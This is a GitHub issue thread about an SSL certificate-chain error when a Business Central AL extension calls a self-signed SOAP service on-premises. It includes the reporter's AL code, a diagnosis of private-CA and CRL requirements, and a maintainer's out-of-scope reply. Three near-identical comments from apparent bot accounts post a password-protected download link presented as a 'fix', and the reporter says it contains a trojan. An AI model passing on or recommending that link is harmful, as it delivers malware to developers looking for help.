### ISSUE TITLE
SSL call via httClient

### ISSUE THREAD

**Issue by jmadrigalTCN** [microsoft/AL#7830]
Please include the following with each issue:

1. Describe the bug
When consuming a SOAP service with a selfsigned certificate, y get this error only on OnPremise, in SaaS it works properly:

The SSL connection could not be established, see inner exception.
The remote certificate is invalid because of errors in the certificate chain: RevocationStatusUnknown, PartialChain, OfflineRevocation

2. To Reproduce

Create a new extension with "AL: Go!"
Download symbols with "AL: Download symbols"

Create this page:
namespace TCN.PruebasTesoralia;
using System.RestClient;
page 50110 pruebas
{
    PageType = Card;
    ApplicationArea = All;
    UsageCategory = Administration;
    Caption = 'Pruebas Tesoralia';
    layout
    {
        area(Content)
        {
            group(GroupName)
            {
                field(Url; gUrl)
                {
                    ApplicationArea = All;
                    Caption = 'URL';
                }
                field(user;gUser)
                {
                    ApplicationArea = All;
                    Caption = 'User';
                }
                field(pass;gPass)
                {
                    ApplicationArea = All;
                    Caption = 'Pass';
                }
            }
        }
    }

    actions
    {
        area(Processing)
        {
            action(getToken03)
            {
                ApplicationArea = All;
                trigger OnAction()
                var
                    client: HttpClient;
                    content: HttpContent;
                    response: HttpResponseMessage;
                    headers: HttpHeaders;
                    request: HttpRequestMessage;
                    respuesta: Text;
                begin
                    client.DefaultRequestHeaders.Add('SOAPAction', 'Login');
                    content.WriteFrom(composeBody());
                    content.GetHeaders(headers);
                    headers.Remove('Content-Type');
                    headers.Add('Content-Type', 'application/soap+xml; charset="utf-8"');
                    request.Method := 'POST';
                    request.SetRequestUri(gUrl);
                    request.Content := content;
                    if not client.Send(request, response) then
                        Error('Error en POST: %1', GetLastErrorText());
                    if not response.IsSuccessStatusCode then
                        Error('%1:%2', response.HttpStatusCode, response.ReasonPhrase);
                    response.Content.ReadAs(respuesta);
                    Message(respuesta);
                end;
            }
        }
    }
    var
        gRestClient: Codeunit "Rest Client";
        gUrl: Text;
        gUser: Text;
        gPass: Text;

    trigger OnOpenPage()
    begin
        gUrl := 'https://api.tesoralia.com/FinancialOnline/Financial.svc';
        gUser := 'UserTest';
        gPass := 'PasswordTest';
    end;

    local procedure composeBody(): Text
    var
        tb: TextBuilder;
    begin
        tb.AppendLine('<Envelope xmlns="http://www.w3.org/2003/05/soap-envelope">');
        tb.AppendLine('  <Body>');
        tb.AppendLine('    <Login xmlns="http://Tesoralia/Services/Financial/1.0">');
        tb.AppendLine('      <request>');
        tb.AppendLine('        <Login>' + gUser + '</Login>');
        tb.AppendLine('        <Password>' + gPass + '</Password>');
        tb.AppendLine('      </request>');
        tb.AppendLine('    </Login>');
        tb.AppendLine('  </Body>');
        tb.AppendLine('</Envelope>');
        exit(tb.ToText());
    end;
}

Create app file with "AL: Package" and install it:
Execute this page and the getToken3 action

3. Expected behavior
If the user and pass are ok, you'll get an access token. I don't, you'll get: 500:Internal Server Error, wich it is ok for this test

4. Actual behavior
Wheter the user and/or pass are correcto or not:
Error en POST: The SSL connection could not be established, see inner exception.
The remote certificate is invalid because of errors in the certificate chain: RevocationStatusUnknown, PartialChain, OfflineRevocation

5. Versions:

AL Language: 14.0.1108692 (pre-release)
Visual Studio Code: 1.92.2
Business Central: 24.0

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jmadrigalTCN** [comment]
> changeme

What's that?
It has a troyan

**Comment by NKarolak** [comment]
GitHub has been attacked by bots - across different repositories, as I have just heard.

**Comment by rdebath** [comment]
https://api.tesoralia.com appears to be a Private CA authorised certificate.
AFAIK It is not possible to connect to this from Microsoft SaaS (cannot add a certificate&crl to the Trusted Store).

For OnPrem installations #3274 becomes an issue.
The CA must be installed onto the trusted store of the server AND a matching CRL (covering the current time) is needed to allow OnPrem to connect. Even if the CA certificate doesn't have a CRL distribution point BC will insist on having one provided.

In addition your server certificate does not have the "Subject Alternative Name" extension, this means browsers will refuse the certificate. I think BC will allow it, but I have not tested this.

I suggest your best solution is to use a [Let's encrypt](https://letsencrypt.org/) certificate to work around the complexity. 

Note: [SSL Labs](https://www.ssllabs.com/ssltest/analyze.html?d=api.tesoralia.com) thinks your server is okay, but has several issues that can become problems with old clients or expected developments.

**Comment by jmadrigalTCN** [comment]
> https://api.tesoralia.com appears to be a Private CA authorised certificate. AFAIK It is not possible to connect to this from Microsoft SaaS (cannot add a certificate&crl to the Trusted Store).
> 
> For OnPrem installations #3274 becomes an issue. The CA must be installed onto the trusted store of the server AND a matching CRL (covering the current time) is needed to allow OnPrem to connect. Even if the CA certificate doesn't have a CRL distribution point BC will insist on having one provided.
> 
> In addition your server certificate does not have the "Subject Alternative Name" extension, this means browsers will refuse the certificate. I think BC will allow it, but I have not tested this.
> 
> I suggest your best solution is to use a [Let's encrypt](https://letsencrypt.org/) certificate to work around the complexity.
> 
> Note: [SSL Labs](https://www.ssllabs.com/ssltest/analyze.html?d=api.tesoralia.com) thinks your server is okay, but has several issues that can become problems with old clients or expected developments.

But... As I said in the first message, in SaaS it Works. How come it does not work in OnPrem?

**Comment by rdebath** [comment]
Yeah, that's bad, makes me wonder if the "Services Certificate Validation" flag turns off too much.

**Comment by thloke** [comment]
Hi, this issue is out of scope of for this repository. You should do one of the following:

- Open a support request to CSS through the PartnerSource portal
- Open a bug in Collaborate
- Contact your Service Account Manager (SAM) in your local subsidiary to understand what is included in your contract as of support incident and PAH (Partner Advisory Hours). Your SAM might also direct you "step by step" how to open a support request or how to get credentials, if this is the first time for you or your company

As a reminder, this repository only handles issues to do with the compiler or VSCode development experience for AL. The handling of SSL calls is not part of that, but rather the runtime execution of AL by the server.
